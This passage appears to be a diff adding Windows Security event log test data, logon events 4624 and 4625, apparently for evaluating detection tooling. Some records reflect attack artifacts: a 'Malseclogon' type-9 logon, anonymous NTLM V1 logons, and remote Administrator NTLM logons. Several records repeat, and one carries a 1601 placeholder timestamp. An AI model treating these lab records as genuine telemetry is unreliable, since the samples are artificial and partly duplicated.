+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988550
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x568d99
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64229
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988547
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56874b
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64227
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988544
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x5686d9
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64226
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988535
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567758
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988529
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567515
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.25
+ 50251
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988525
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56738f
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64223
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988522
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-84104
+ 02694W-WIN10$
+ THREEBEESCO.COM
+ 0x567343
+ 3
+ Kerberos
+ Kerberos
+ -
+ 429CA5A3-EDFC-5657-17C3-C050C7B047F4
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.25
+ 50250
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988550
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x568d99
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64229
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988547
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56874b
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64227
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988544
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x5686d9
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64226
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988535
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567758
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988529
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567515
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.25
+ 50251
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988525
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56738f
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64223
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988522
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-84104
+ 02694W-WIN10$
+ THREEBEESCO.COM
+ 0x567343
+ 3
+ Kerberos
+ Kerberos
+ -
+ 429CA5A3-EDFC-5657-17C3-C050C7B047F4
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.25
+ 50250
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772611
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1137987
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50107
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772609
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x244
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772607
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1136e95
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50106
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2021-12-07T21:33:01.619364+04:00,1638898381.619364,4624,IEUser,MSEDGEWIN10,9,seclogo,::1,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 329918
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 9
+ seclogo
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+ %%1833
+ -
+ MalseclogonUser
+ MalseclogonDomain
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
